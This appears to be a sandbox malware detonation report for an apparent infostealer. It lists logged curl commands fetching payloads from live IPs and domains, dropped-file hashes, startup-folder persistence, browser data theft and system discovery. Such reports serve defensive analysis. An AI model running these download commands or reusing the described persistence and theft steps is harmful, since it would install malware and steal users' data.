"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\mvosy" "178.215.224.161/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\acrxz" "178.215.224.251/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\bwimx" "178.215.224.65/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\zqalu" "bnrwinonalolita.com/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\salig" "dionisarnoldcefee.com/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\pyxgn" "178.215.224.252/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\gbhnc" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\skigw" "178.215.224.161/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\mmnzc" "178.215.224.251/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\cnjui" "178.215.224.65/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\wfmgw" "bnrwinonalolita.com/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\lzvtc" "dionisarnoldcefee.com/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\wmknk" "178.215.224.252/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\sjngf" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\bfarj" "178.215.224.161/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\jlmee" "178.215.224.251/v10/ukyh.php?jspo=6"

Network

Country Destination Domain Proto
US 8.8.8.8:53 WYEKIpcBRejRrpSfXIwIdpR.WYEKIpcBRejRrpSfXIwIdpR udp

Files

C:\Users\Admin\AppData\Local\Temp\Tuition

MD5 cec47644f0f51a10cce5656a87673d71
SHA1 b7abebf08227a9860d7300128a9161841a4b191f
SHA256 34f31de17e65a33977c52d925c766af16d01e97ed9dd84f72048f1a9b5cb269e
SHA512 42ead80a00f47d02074b131e9b54037840ce182b963fe0b1a279d6a851fd300dd0be355503308ad489646e52f081fa46f76e76f915e01162b8b061764663c167

C:\Users\Admin\AppData\Local\Temp\Slovenia

MD5 1332165a90a96d564adbea76842051de
SHA1 6a99c791f8a492ecccf5ada0b77be493a61b1bc9
SHA256 e9edb0d724fc9f115572c847bc1d0c63b9a53d577771bd62384ba145ccc8ff36
SHA512 d6f3da7a6d6c1c8d6219a6c1512e693dbc9e06db9906d1a0e50da90971a13efdf26b413a713b46e71583b1878271ab8795e9aecf82a59359b5114248c4ef4bc6

C:\Users\Admin\AppData\Local\Temp\Index

MD5 358194c0c510ff11f8f3d68afe5ea595
SHA1 e801c32a9b1414741a6fb2aec201d979ec927bbf
SHA256 cfb087fd56dd576f4f4db3b0930adf021950b20b65fe4c1527cb9a090e00565b
SHA512 8805cc8cb6eeb466afe5f5bea5baf3eeda3cf6f422cc761239c31656624472637d5d3a5ecfec45f134f620c34a674e8edd8b88ff36647ea4628bfcc7988fac86

C:\Users\Admin\AppData\Local\Temp\Tackle

MD5 a28ef671a2529783f795e0ce242b69a7
SHA1 3605589e946dcac4492b8a7799660ff4f1a323d1
SHA256 9d68a50b8498172bb2607b4652ed522d009e487cb0683c155805ef199274a745
SHA512 b67e45bda8d8733994f0eabeb454c5853ae5e6f06c7c49826b3995f23d2a5909ac0678f7e810dd7c78fbe3c25a46c996e1b55cc2f880aabcb343979b88448aa8

C:\Users\Admin\AppData\Local\Temp\Heather

MD5 5ebe13d4704e614c4e597bed036a2591
SHA1 b6a40f939e04c997482307fb14126e716efafb2b
SHA256 3b65ae5300550700ece120dade16b6a47ceda16b437853eda1d5c4358d990712
SHA512 ee436b9624eb7eed3c4ae94637a9f13e53cd8da340aad4850cd9c8b8a7d98545623579cb34829ffe04904274033ae7f90f2d18f9dc1ecf260294c76cce943c36

C:\Users\Admin\AppData\Local\Temp\Merit

MD5 f8fef0dc6066b6bdae93db3c69368170
SHA1 e4d55d4c83b049968d5a6f4eee6ad9efe86dff79
SHA256 d945301adc544bc59bac06e95326eea938fc0e88a004bc36ab10e2eda222e374
SHA512 274311de8ddabaa6de2ad8f2266a6af3f2e306e488e272e3d6931c2edbc95437cfe0cd0f32e2818bf6daf30872d2ef1e610257f1ec85e20b7c4ba4d78d83a6c4

C:\Users\Admin\AppData\Local\Temp\Events

MD5 67498253ff01bc79ab26bdaa2183b367
SHA1 5c6efd758ab0b450c8a9ecaeb108e9272535a3b3
SHA256 60c91ae2bed2f72dda2ff6cb4deb1367a437df370be43bea1b7fdb58fd43fae8
SHA512 75fd5cf671a177d0c0ff18e2d088b1b6de0ef839cfd5ea410c4cfba65f26e2253983fb0ad7904cd4ba3f012b035a4682cc95ffbc35d96ad84c09ed2fc3cc19e8

C:\Users\Admin\AppData\Local\Temp\Environment

MD5 b6024d20dba6454f8e2df9086438fce7
SHA1 3edb339cc5960a05ab3d1ab615d4152b092ee832
SHA256 a87a9f1aee8317c1f3fd9c69ee65a569944618092cc1f6fbeb467ab2aa73cecf
SHA512 651e002fa45b48d51803fdd13ff379bf29937438df3a4001c7f935643ca1de4b5a2e4a4a376adf1b3c35b00ac1ed0856916b9d048a88a07a4d8bb989c4a62c56

C:\Users\Admin\AppData\Local\Temp\Column

MD5 d05e382bb4f1e9bb4bce6108e318ea6b
SHA1 ae0344388bc8d4e10a93c305c1f80bc60ab7bd7a
SHA256 ccd218caebb98be70e2caf40b17d54510571e48efa475cdce3c2f71581232a51
SHA512 742980e178aa801829c623ab9ff4d494d8555e2ef26542abdaf46b47fcf521ccf8dd7bf248ff98f1104a8fb18606c84bb4ca198df3ee28b96525bccae7a06d80

C:\Users\Admin\AppData\Local\Temp\Law

MD5 a57501ae52b7c24db316a678306f8083
SHA1 3cf2b2942943163781db70f6759153214fcd1c37
SHA256 8ea7d0e706039bd23733e77b84199102bcd4df8ece1e0c63daf55ed29749683c
SHA512 306de902e6f18b1acceb3bbac47b619bcd0f148a04fd634d13c0a9fdf57ec56edd688ffdd56ec6c827897209c3ffeeb362b2acfe9e1f2df348d7982e4c5626fc

C:\Users\Admin\AppData\Local\Temp\Explanation

MD5 773bc1cb8deb9ff09bc892af84ae5681
SHA1 09f815af8eca0c373302204f58b47f591a300b7c
SHA256 f97765bb2d46f5755af315c71afeb50f52f282caee0a19b9f2644946a9308d42
SHA512 e05b77521bf5c51b60a0d7e9cdc8df2c06e3a065dc3afd42d34444484941b934e36e1ce4f80fb7a86d7c1bb8935abed9070672a02a4a3c12e22a17907b0c9223

\Users\Admin\AppData\Local\Temp\226443\Crossword.pif

MD5 78ba0653a340bac5ff152b21a83626cc
SHA1 b12da9cb5d024555405040e65ad89d16ae749502
SHA256 05d8cf394190f3a707abfb25fb44d7da9d5f533d7d2063b23c00cc11253c8be7
SHA512 efb75e4c1e0057ffb47613fd5aae8ce3912b1558a4b74dbf5284c942eac78ecd9aca98f7c1e0e96ec38e8177e58ffdf54f2eb0385e73eef39e8a2ce611237317

C:\Users\Admin\AppData\Local\Temp\226443\d

MD5 7e6971c69a6ca7279da0e89b4b388189
SHA1 894fdd50dead4f46ac677ad06d1455943167ae1f
SHA256 1ae9c8851afa317293db0435ea27ad3fa8fda82a08209ee536ec947130e5c98c
SHA512 06296a0878df852fdd54fb31366d09c5c1984e1f6eaea22f1895d40a78d0ff07cf7a90bf1725becc630dbb33906d0764d6f314653c8f965ffdd91310c9699c0b

memory/840-622-0x0000000003540000-0x000000000359A000-memory.dmp

memory/840-624-0x0000000003540000-0x000000000359A000-memory.dmp

memory/840-623-0x0000000003540000-0x000000000359A000-memory.dmp

memory/840-626-0x0000000003540000-0x000000000359A000-memory.dmp

memory/840-625-0x0000000003540000-0x000000000359A000-memory.dmp

memory/840-627-0x0000000003540000-0x000000000359A000-memory.dmp

C:\Users\Admin\AppData\Local\temp\115

MD5 b65e9213dae00101a52d72b56120ff81
SHA1 d52caec94e56a19cca2bcc6e38dc780b1cb90027
SHA256 dfa7c49d13da53cc057bce84a0944d83258bf61671f92b2f7d0d9ee3e3896740
SHA512 09daf8969898babaaaa9ae8959b5345e204a27ff7b84f0bfb696b1e25130a9f659519a040eeaeae74c8c091586e76a6150743b30f419c0b1952c24c6c227584e

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-12 16:39

Reported

2024-11-12 16:42

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

155s

Command Line

C:\Windows\Explorer.EXE

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 1208 created 3536 N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif C:\Windows\Explorer.EXE

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\303482\Either.pif N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\uwu.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\temp\RevenueDevices.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CyberGuard.url C:\Windows\SysWOW64\cmd.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CyberGuard.url C:\Windows\SysWOW64\cmd.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\303482\Either.pif N/A

Reads user/profile data of web browsers

spyware stealer

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\BrushSub C:\Users\Admin\AppData\Local\temp\RevenueDevices.exe N/A
File opened for modification C:\Windows\McLol C:\Users\Admin\AppData\Local\temp\RevenueDevices.exe N/A
File opened for modification C:\Windows\SoilOasis C:\Users\Admin\AppData\Local\Temp\uwu.exe N/A
File opened for modification C:\Windows\RebatesPalm C:\Users\Admin\AppData\Local\Temp\uwu.exe N/A
File opened for modification C:\Windows\DouglasWind C:\Users\Admin\AppData\Local\Temp\uwu.exe N/A
File opened for modification C:\Windows\TmpMoon C:\Users\Admin\AppData\Local\temp\RevenueDevices.exe N/A
File opened for modification C:\Windows\NotifiedAaron C:\Users\Admin\AppData\Local\temp\RevenueDevices.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\DolphinDumps\azvw.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\303482\Either.pif N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\DolphinDumps\7za.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\Robocopy.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\systeminfo.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
